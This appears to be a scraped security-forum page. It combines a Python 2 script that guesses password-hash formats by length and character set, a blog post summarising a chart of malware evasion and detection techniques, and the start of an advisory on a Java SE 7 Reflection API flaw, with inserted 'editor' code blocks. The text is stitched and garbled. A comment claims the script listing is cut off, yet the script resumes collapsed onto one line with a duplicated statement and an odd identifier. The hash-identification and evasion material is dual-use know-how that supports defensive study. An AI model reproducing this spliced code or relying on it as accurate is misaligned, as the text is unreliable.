    hs = '5b8b12ca69d3e7b2a3e2308e7bef3e6f'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106380")


def md5saltmd5saltpass():
    hs = 'd8f3b3f004d387086aae24326b575b23'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106400")


def md5saltmd5md5passsalt():
    hs = '81f181454e23319779b03d74d062b1a2'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106420")


def md5username0pass():
    hs = 'e44a60f8f2106492ae16581c91edb3ba'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106440")


def md5usernameLFpass():
    hs = '654741780db415732eaee12b1b909119'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106460")


def md5usernamemd5passsalt():
    hs = '954ac5505fd1843bbb97d1b2cda0b98f'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106480")


def md5md5pass():
    hs = 'a96103d267d024583d5565436e52dfb3'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        jerar.append("106500")


def md5md5passsalt():
    hs = '5848c73c2482d3c2c7b6af134ed8dd89'
    if len(hash) == len(hs) and not hash.isdigit() and not hash.isalpha() and hash.isalnum():
        # the listing is cut off at this point; the identifier is the one the
        # "algorithms" table assigns to md5(md5($pass).$salt)
        jerar.append("106520")

# The remaining detectors and the main flow that calls them are not included in this excerpt.
jerar.append("106520") def md5md5passmd5salt(): hs='8dc71ef37197b2edba02d48c30217b32' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106540") def md5md5saltpass(): hs='9032fabd905e273b9ceb1e124631bd67' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106560") def md5md5saltmd5pass(): hs='8966f37dbb4aca377a71a9d3d09cd1ac' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106580") def md5md5usernamepasssalt(): hs='4319a3befce729b34c3105dbc29d0c40' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106600") def md5md5md5pass(): hs='ea086739755920e732d0f4d8c1b6ad8d' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106620") def md5md5md5md5pass(): hs='02528c1f2ed8ac7d83fe76f3cf1c133f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106640") def md5md5md5md5md5pass(): hs='4548d2c062933dff53928fd4ae427fc0' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106660") def md5sha1pass(): hs='cb4ebaaedfd536d965c452d9569a6b1e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106680") def md5sha1md5pass(): hs='099b8a59795e07c334a696a10c0ebce0' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106700") def md5sha1md5sha1pass(): hs='06e4af76833da7cc138d90602ef80070' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("106720") def md5strtouppermd5pass(): hs='519de146f1a658ab5e5e2aa9b7d2eec8' if len(hash)==len(hs) and hash.isdigit()==False and 
hash.isalpha()==False and hash.isalnum()==True: jerar.append("106740") def LineageIIC4(): hs='0x49a57f66bd3d5ba6abda5579c264a0e4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True and hash[0:2].find('0x')==0: jerar.append("107080") def MD5phpBB3(): hs='$H$9kyOtE8CDqMJ44yfn9PFz2E.L2oVzL1' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$H$')==0: jerar.append("107040") def MD5Unix(): hs='$1$cTuJH0Ju$1J8rI.mJReeMvpKUZbSlY/' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$1$')==0: jerar.append("107060") def MD5Wordpress(): hs='$P$BiTOhOj3ukMgCci2juN0HRbCdDRqeh.' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$P$')==0: jerar.append("107020") def MD5APR(): hs='$apr1$qAUKoKlG$3LuCncByN76eLxZAh/Ldr1' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash[0:4].find('$apr')==0: jerar.append("108020") def Haval160(): hs='a106e921284dd69dad06192a4411ec32fce83dbb' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109100") def Haval160HMAC(): hs='29206f83edc1d6c3f680ff11276ec20642881243' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109200") def MySQL5(): hs='9bb2fb57063821c762cc009f7584ddae9da431ff' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109040") def MySQL160bit(): hs='*2470c0c06dee42fd1618bb99005adca2ec9d1e19' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:1].find('*')==0: jerar.append("109060") def RipeMD160(): hs='dc65552812c66997ea7320ddfb51f5625d74721b' if len(hash)==len(hs) and hash.isdigit()==False and 
hash.isalpha()==False and hash.isalnum()==True: jerar.append("109120") def RipeMD160HMAC(): hs='ca28af47653b4f21e96c1235984cb50229331359' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109180") def SHA1(): hs='4a1d4dbc1e193ec3ab2e9213876ceb8f4db72333' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109020") def SHA1HMAC(): hs='6f5daac3fee96ba1382a09b1ba326ca73dccf9e7' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109140") def SHA1MaNGOS(): hs='a2c0cdb6d1ebd1b9f85c6e25e0f8732e88f02f96' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109220") def SHA1MaNGOS2(): hs='644a29679136e09d0bd99dfd9e8c5be84108b5fd' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109240") def Tiger160(): hs='c086184486ec6388ff81ec9f235287270429b225' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109080") def Tiger160HMAC(): hs='6603161719da5e56e1866e4f61f79496334e6a10' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109160") def sha1passsalt(): hs='f006a1863663c21c541c8d600355abfeeaadb5e4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109260") def sha1saltpass(): hs='299c3d65a0dcab1fc38421783d64d0ecf4113448' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109280") def sha1saltmd5pass(): hs='860465ede0625deebb4fbbedcb0db9dc65faec30' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109300") def sha1saltmd5passsalt(): 
hs='6716d047c98c25a9c2cc54ee6134c73e6315a0ff' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109320") def sha1saltsha1pass(): hs='58714327f9407097c64032a2fd5bff3a260cb85f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109340") def sha1saltsha1saltsha1pass(): hs='cc600a2903130c945aa178396910135cc7f93c63' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109360") def sha1usernamepass(): hs='3de3d8093bf04b8eb5f595bc2da3f37358522c9f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109380") def sha1usernamepasssalt(): hs='00025111b3c4d0ac1635558ce2393f77e94770c5' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109400") def sha1md5pass(): hs='fa960056c0dea57de94776d3759fb555a15cae87' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("1094202") def sha1md5passsalt(): hs='1dad2b71432d83312e61d25aeb627593295bcc9a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109440") def sha1md5sha1pass(): hs='8bceaeed74c17571c15cdb9494e992db3c263695' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109460") def sha1sha1pass(): hs='3109b810188fcde0900f9907d2ebcaa10277d10e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109480") def sha1sha1passsalt(): hs='780d43fa11693b61875321b6b54905ee488d7760' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109500") def sha1sha1passsubstrpass03(): hs='5ed6bc680b59c580db4a38df307bd4621759324e' if 
len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109520") def sha1sha1saltpass(): hs='70506bac605485b4143ca114cbd4a3580d76a413' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109540") def sha1sha1sha1pass(): hs='3328ee2a3b4bf41805bd6aab8e894a992fa91549' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109560") def sha1strtolowerusernamepass(): hs='79f575543061e158c2da3799f999eb7c95261f07' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("109580") def Haval192(): hs='cd3a90a3bebd3fa6b6797eba5dab8441f16a7dfa96c6e641' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110040") def Haval192HMAC(): hs='39b4d8ecf70534e2fd86bb04a877d01dbf9387e640366029' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110080") def Tiger192(): hs='c086184486ec6388ff81ec9f235287270429b2253b248a70' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110020") def Tiger192HMAC(): hs='8e914bb64353d4d29ab680e693272d0bd38023afa3943a41' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("110060") def MD5passsaltjoomla1(): hs='35d1c0d69a2df62be2df13b087343dc9:BeKMviAfcXeTPTlX' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: jerar.append("112020") def SHA1Django(): hs='sha1$Zion3R$299c3d65a0dcab1fc38421783d64d0ecf4113448' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:5].find('sha1$')==0: jerar.append("113020") def Haval224(): 
hs='f65d3c0ef6c56f4c74ea884815414c24dbf0195635b550f47eac651a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114040") def Haval224HMAC(): hs='f10de2518a9f7aed5cf09b455112114d18487f0c894e349c3c76a681' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114080") def SHA224(): hs='e301f414993d5ec2bd1d780688d37fe41512f8b57f6923d054ef8e59' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114020") def SHA224HMAC(): hs='c15ff86a859892b5e95cdfd50af17d05268824a6c9caaa54e4bf1514' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("114060") def SHA256(): hs='2c740d20dab7f14ec30510a11f8fd78b82bc3a711abe8a993acdb323e78e6d5e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115020") def SHA256HMAC(): hs='d3dd251b7668b8b6c12e639c681e88f2c9b81105ef41caccb25fcde7673a1132' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115120") def Haval256(): hs='7169ecae19a5cd729f6e9574228b8b3c91699175324e6222dec569d4281d4a4a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115040") def Haval256HMAC(): hs='6aa856a2cfd349fb4ee781749d2d92a1ba2d38866e337a4a1db907654d4d4d7a' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115140") def GOSTR341194(): hs='ab709d384cce5fda0793becd3da0cb6a926c86a8f3460efb471adddee1c63793' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115060") def RipeMD256(): hs='5fcbe06df20ce8ee16e92542e591bdea706fbdc2442aecbf42c223f4461a12af' if len(hash)==len(hs) and hash.isdigit()==False and 
hash.isalpha()==False and hash.isalnum()==True: jerar.append("115080") def RipeMD256HMAC(): hs='43227322be1b8d743e004c628e0042184f1288f27c13155412f08beeee0e54bf' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115160") def SNEFRU256(): hs='3a654de48e8d6b669258b2d33fe6fb179356083eed6ff67e27c5ebfa4d9732bb' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115100") def SNEFRU256HMAC(): hs='4e9418436e301a488f675c9508a2d518d8f8f99e966136f2dd7e308b194d74f9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115180") def SHA256md5pass(): hs='b419557099cfa18a86d1d693e2b3b3e979e7a5aba361d9c4ec585a1a70c7bde4' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115200") def SHA256sha1pass(): hs='afbed6e0c79338dbfe0000efe6b8e74e3b7121fe73c383ae22f5b505cb39c886' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("115220") def MD5passsaltjoomla2(): hs='fb33e01e4f8787dc8beb93dac4107209:fxJUXVjYRafVauT77Cze8XwFrWaeAYB2' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[32:33].find(':')==0: jerar.append("116020") def SAM(): hs='4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash.islower()==False and hash[32:33].find(':')==0: jerar.append("116040") def SHA256Django(): hs='sha256$Zion3R$9e1a08aa28a22dfff722fad7517bae68a55444bb5e2f909d340767cec9acf2c3' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha256')==0: jerar.append("117020") def RipeMD320(): 
hs='b4f7c8993a389eac4f421b9b3b2bfb3a241d05949324a8dab1286069a18de69aaf5ecc3c2009d8ef' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("118020") def RipeMD320HMAC(): hs='244516688f8ad7dd625836c0d0bfc3a888854f7c0161f01de81351f61e98807dcd55b39ffe5d7a78' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("118040") def SHA384(): hs='3b21c44f8d830fa55ee9328a7713c6aad548fe6d7a4a438723a0da67c48c485220081a2fbc3e8c17fd9bd65f8d4b4e6b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("119020") def SHA384HMAC(): hs='bef0dd791e814d28b4115eb6924a10beb53da47d463171fe8e63f68207521a4171219bb91d0580bca37b0f96fddeeb8b' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("119040") def SHA256s(): hs='$6$g4TpUQzk$OmsZBJFwvy6MwZckPvVYfDnwsgktm2CckOlNJGy9HNwHSuHFvywGIuwkJ6Bjn3kKbB6zoyEjIYNMpHWBNxJ6g.' 
if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:3].find('$6$')==0: jerar.append("120020") def SHA384Django(): hs='sha384$Zion3R$88cfd5bc332a4af9f09aa33a1593f24eddc01de00b84395765193c3887f4deac46dc723ac14ddeb4d3a9b958816b7bba' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==False and hash[0:6].find('sha384')==0: print " [+] SHA-384(Django)" jerar.append("121020") def SHA512(): hs='ea8e6f0935b34e2e6573b89c0856c81b831ef2cadfdee9f44eb9aa0955155ba5e8dd97f85c73f030666846773c91404fb0e12fb38936c56f8cf38a33ac89a24e' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("122020") def SHA512HMAC(): hs='dd0ada8693250b31d9f44f3ec2d4a106003a6ce67eaa92e384b356d1b4ef6d66a818d47c1f3a2c6e8a9a9b9bdbd28d485e06161ccd0f528c8bbb5541c3fef36f' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("122060") def Whirlpool(): hs='76df96157e632410998ad7f823d82930f79a96578acc8ac5ce1bfc34346cf64b4610aefa8a549da3f0c1da36dad314927cebf8ca6f3fcd0649d363c5a370dddb' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("122040") def WhirlpoolHMAC(): hs='77996016cf6111e97d6ad31484bab1bf7de7b7ee64aebbc243e650a75a2f9256cef104e504d3cf29405888fca5a231fcac85d36cd614b1d52fce850b53ddf7f9' if len(hash)==len(hs) and hash.isdigit()==False and hash.isalpha()==False and hash.isalnum()==True: jerar.append("122080") print logo while True: jerar=[] print """ -------------------------------------------------------------------------""" hash = raw_input(" HASH: ") ADLER32(); CRC16(); CRC16CCITT(); CRC32(); CRC32B(); DESUnix(); DomainCachedCredentials(); FCS16(); GHash323(); GHash325(); GOSTR341194(); Haval128(); Haval128HMAC(); Haval160(); Haval160HMAC(); Haval192(); Haval192HMAC(); Haval224(); Haval224HMAC(); Haval256(); Haval256HMAC(); 
LineageIIC4(); MD2(); MD2HMAC(); MD4(); MD4HMAC(); MD5(); MD5APR(); MD5HMAC(); MD5HMACWordpress(); MD5phpBB3(); MD5Unix(); MD5Wordpress(); MD5Half(); MD5Middle(); MD5passsaltjoomla1(); MD5passsaltjoomla2(); MySQL(); MySQL5(); MySQL160bit(); NTLM(); RAdminv2x(); RipeMD128(); RipeMD128HMAC(); RipeMD160(); RipeMD160HMAC(); RipeMD256(); RipeMD256HMAC(); RipeMD320(); RipeMD320HMAC(); SAM(); SHA1(); SHA1Django(); SHA1HMAC(); SHA1MaNGOS(); SHA1MaNGOS2(); SHA224(); SHA224HMAC(); SHA256(); SHA256s(); SHA256Django(); SHA256HMAC(); SHA256md5pass(); SHA256sha1pass(); SHA384(); SHA384Django(); SHA384HMAC(); SHA512(); SHA512HMAC(); SNEFRU128(); SNEFRU128HMAC(); SNEFRU256(); SNEFRU256HMAC(); Tiger128(); Tiger128HMAC(); Tiger160(); Tiger160HMAC(); Tiger192(); Tiger192HMAC(); Whirlpool(); WhirlpoolHMAC(); XOR32(); md5passsalt(); md5saltmd5pass(); md5saltpass(); md5saltpasssalt(); md5saltpassusername(); md5saltmd5pass(); md5saltmd5passsalt(); md5saltmd5passsalt(); md5saltmd5saltpass(); md5saltmd5md5passsalt(); md5username0pass(); md5usernameLFpass(); md5usernamemd5passsalt(); md5md5pass(); md5md5passsalt(); md5md5passmd5salt(); md5md5saltpass(); md5md5saltmd5pass(); md5md5usernamepasssalt(); md5md5md5pass(); md5md5md5md5pass(); md5md5md5md5md5pass(); md5sha1pass(); md5sha1md5pass(); md5sha1md5sha1pass(); md5strtouppermd5pass(); sha1passsalt(); sha1saltpass(); sha1saltmd5pass(); sha1saltmd5passsalt(); sha1saltsha1pass(); sha1saltsha1saltsha1pass(); sha1usernamepass(); sha1usernamepasssalt(); sha1md5pass(); sha1md5passsalt(); sha1md5sha1pass(); sha1sha1pass(); sha1sha1passsalt(); sha1sha1passsubstrpass03(); sha1sha1saltpass(); sha1sha1sha1pass(); sha1strtolowerusernamepass() if len(jerar)==0: print "" print " Not Found." 
elif len(jerar)>2: jerar.sort() print "" print "Possible Hashs:" print "[+] ",algorithms[jerar[0]] print "[+] ",algorithms[jerar[1]] print "" print "Least Possible Hashs:" for a in range(int(len(jerar))-2): print "[+] ",algorithms[jerar[a+2]] else: jerar.sort() print "" print "Possible Hashs:" for a in range(len(jerar)): print "[+] ",algorithms[jerar[a]] Posted by Marco Ramilli at 3:39 AM Sursa: Marco Ramilli's Blog: Hash Detector Tool
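Added example (the editor's, not part of the Hash Detector script above): a table-driven version of the same length/charset/prefix heuristic, with one regex per format in place of the isdigit/isalpha/isalnum chain. It goes beyond the script in one respect: an all-decimal hex digest, which the script's isdigit()==False tests reject, is still recognised. The rule names and their specific-to-generic ordering are mine; two sample inputs are the script's own test strings (the MD5 and SAM samples), the rest are constructed with hashlib, and the crypt-style sample has a constructed body that is not a real hash.

```python
import hashlib
import re

# One rule per format: (label, full-string regex).  Ordered most specific
# (fixed prefix or separator) to least specific (bare hex of a given length),
# so identify()[0] is the best guess.  Bare-hex lengths are ambiguous by
# nature: 32 hex characters may be MD5, MD4, NTLM, Haval-128 and more.
RULES = [
    ("SAM (LM:NT)",                         r"[0-9A-F]{32}:[0-9A-F]{32}"),
    ("Joomla md5:salt",                     r"[0-9a-fA-F]{32}:[^:]{16,32}"),
    ("Django sha1$salt$hash",               r"sha1\$[^$]*\$[0-9a-fA-F]{40}"),
    ("Django sha256$salt$hash",             r"sha256\$[^$]*\$[0-9a-fA-F]{64}"),
    ("crypt $6$ (SHA-512 crypt)",           r"\$6\$[./0-9A-Za-z]{1,16}\$[./0-9A-Za-z]{86}"),
    ("MD5(Unix) crypt $1$",                 r"\$1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}"),
    ("MD5(APR) crypt $apr1$",               r"\$apr1\$[./0-9A-Za-z]{1,8}\$[./0-9A-Za-z]{22}"),
    ("phpBB3 / Wordpress portable hash",    r"\$[HP]\$[./0-9A-Za-z]{31}"),
    ("MySQL 4.1+ (*40 hex)",                r"\*[0-9A-Fa-f]{40}"),
    ("Lineage II C4 (0x + 32 hex)",         r"0x[0-9a-fA-F]{32}"),
    ("CRC32 / Adler-32 (8 hex)",            r"[0-9a-fA-F]{8}"),
    ("MySQL < 4.1 / MD5 half (16 hex)",     r"[0-9a-fA-F]{16}"),
    ("MD5 / MD4 / NTLM / Haval-128 / RipeMD-128 (32 hex)", r"[0-9a-fA-F]{32}"),
    ("SHA-1 / RipeMD-160 / MySQL5 (40 hex)", r"[0-9a-fA-F]{40}"),
    ("SHA-224 / Haval-224 (56 hex)",        r"[0-9a-fA-F]{56}"),
    ("SHA-256 / GOST / RipeMD-256 (64 hex)", r"[0-9a-fA-F]{64}"),
    ("SHA-384 (96 hex)",                    r"[0-9a-fA-F]{96}"),
    ("SHA-512 / Whirlpool (128 hex)",       r"[0-9a-fA-F]{128}"),
]


def identify(candidate):
    """Return the labels of every rule the whole string matches, best guess first."""
    s = candidate.strip()
    return [label for label, pattern in RULES if re.fullmatch(pattern, s)]


def demo():
    """Run identify() over constructed samples; returns {sample name: labels}."""
    pw = b"constructed-sample-password"  # constructed input, not a real credential
    samples = {
        "md5": hashlib.md5(pw).hexdigest(),
        "sha1": hashlib.sha1(pw).hexdigest(),
        "sha256": hashlib.sha256(pw).hexdigest(),
        # MySQL 4.1+ stores '*' + SHA1(SHA1(password)) in upper-case hex
        "mysql41": "*" + hashlib.sha1(hashlib.sha1(pw).digest()).hexdigest().upper(),
        # constructed $6$ body: right shape and length, not a real crypt output
        "crypt6": "$6$saltsalt$" + "A" * 86,
        # the two strings below are the test samples from the script above
        "script_md5_sample": "ae11fd697ec92c7c98de3fac23aba525",
        "script_sam_sample": "4318B176C3D8E3DEAAD3B435B51404EE:B7C899154197E8A2A33121D76A240AB5",
    }
    return {name: identify(value) for name, value in samples.items()}


if __name__ == "__main__":
    for name, labels in demo().items():
        print(f"{name:18s} -> {labels if labels else ['not recognised']}")
```

The SAM sample matches both the SAM rule and the Joomla rule (32 hex, a colon, then 16 to 32 non-colon characters), which is exactly the ambiguity the script resolves by ranking; here the ordering of RULES does the same job.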
  12. Malware Evasion Chart

Plenty of documents are describing how Malwares implement "Escape" techniques in order to evade Malware analysis. I did write posts on several of the most interesting evasion techniques (available here and here), adding information on my side as well. Today I want to share a personal MAP that I made to correlate evasion techniques to detection techniques. It helped me a lot during some of my past talks as well as during my (research) malware writing nights.

The aim of the following MAP is to correlate evasion techniques to detection techniques without pretending to be "cool/graphically appealing" or "complete". It wants to be "remind me what happens there".

[Figure: Malware Evasion Chart 101 (Download PDF)]

The "soul" of the entire chart is straight in the center. Highlighted in blue shape the Analysis techniques. Highlighted in red shape the corresponding evasion techniques. In separate colored boxes significant examples of evasion techniques (again, there are many many many other ways to perform debugging traps/Red Pills/etc../etc... this wants to be only a "remind").

A glimpse of content: All the detection techniques could be clustered into two big groups: "Static Analysis" and "Dynamic Analysis". The Static analysis could be divided into "Signature" based techniques and "Decompiling" based techniques. The first set of techniques are based on signature matching. A signature is a set of bytes (not adjacent). The second set of techniques look into binaries trying to understand behavior without running the binary on its own. These techniques are quite useful on pieces of data junk or not executable data. On the other side "dynamic analysis", where the analyst runs the Malware. These techniques could be divided into "System Centric" and "Program Centric".

The main difference between such techniques is the perspective. If you analyse the binary from inside you are "Program Centric" and so you might debug the binary and/or look for internal API calls. If you are analyzing the binary from outside you are "System Centric" and you probably are sandboxing the binary. In the example boxes you find significative pieces of code and/or softwares that are used to achieve the evasion technique. For instance in the green box named "Code not run" PEditor shows how to modify the OEP (Original Entry Point) of a program to run unaligned code. In the box named "Breaking/watching/Catching point handlers" one of the most famous signal handlers have been shown and so forth and so on.

If you find the MAP useful, please leave a comment; if you'd like to expand it please send me an email, I'd like to receive help in expanding it. Hope you'll enjoy.

Source: Marco Ramilli's Blog: Malware Evasion Chart
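Added example (the editor's, not from the post or the chart): the "Signature" branch of the chart in code. A signature here is a list of byte values with "??" wildcards, so the bytes that must match need not be adjacent, and the demo shows why that matters: an exact-byte signature over a constructed 7-byte x86 fragment (mov eax, imm32 followed by jmp eax) stops matching as soon as the immediate changes, while a signature that wildcards the immediate still fires. Both buffers and both signatures are constructed for the demo; they are not real malware samples or vendor signatures.

```python
def parse_signature(text):
    """'B8 ?? ?? ?? ?? FF E0' -> [0xB8, None, None, None, None, 0xFF, 0xE0].
    None is a wildcard that matches any byte."""
    out = []
    for tok in text.split():
        out.append(None if tok == "??" else int(tok, 16))
    return out


def find_signature(buf, sig):
    """Return every offset in buf at which sig matches."""
    hits = []
    width = len(sig)
    for off in range(len(buf) - width + 1):
        if all(b is None or buf[off + i] == b for i, b in enumerate(sig)):
            hits.append(off)
    return hits


# Constructed buffers: four NOPs, then  B8 <imm32>  (mov eax, imm32)
# followed by  FF E0  (jmp eax), then four more NOPs.  Only the immediate
# differs between the two variants.
PAD = b"\x90" * 4
VARIANT_A = PAD + bytes.fromhex("B8 78 56 34 12 FF E0") + PAD
VARIANT_B = PAD + bytes.fromhex("B8 EF BE AD DE FF E0") + PAD

# Exact signature taken from variant A, and a wildcarded one covering the
# immediate operand (the part an author can change without changing behaviour).
EXACT_SIG = parse_signature("B8 78 56 34 12 FF E0")
WILDCARD_SIG = parse_signature("B8 ?? ?? ?? ?? FF E0")


def coverage():
    """Which (signature, variant) pairs detect? Returns {name: offsets}."""
    return {
        "exact/A": find_signature(VARIANT_A, EXACT_SIG),
        "exact/B": find_signature(VARIANT_B, EXACT_SIG),
        "wildcard/A": find_signature(VARIANT_A, WILDCARD_SIG),
        "wildcard/B": find_signature(VARIANT_B, WILDCARD_SIG),
    }


if __name__ == "__main__":
    for name, offsets in coverage().items():
        print(f"{name:12s} matched at {offsets}")
```

The exact signature detects variant A only; the wildcarded one detects both, which is the trade-off the chart's static-analysis branch summarises: the more of a signature is pinned to exact bytes, the easier it is to evade with a trivial edit, and the more of it is wildcarded, the greater the risk of matching benign code.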
  13. [SE-2012-01] New Reflection API affected by a known 10+ years old attack

From: Security Explorations <contact () security-explorations com>
Date: Thu, 18 Jul 2013 06:50:30 +0200

Hello All,

We discovered yet another indication that new Reflection API introduced into Java SE 7 was not a subject to a thorough security review (if any).

A new vulnerability (Issue 69) that was submitted to Oracle today makes it possible to implement a very classic attack against Java VM. What's in particular interesting is that the attack itself has been in the public knowledge for at least 10+ years [1]. It's one of those risks one should protect against in the first place when new features are added to Java at the core VM level. The more surprising it is to discover that Reflection API introduced to Java SE 7 didn't implement proper protection against this attack.

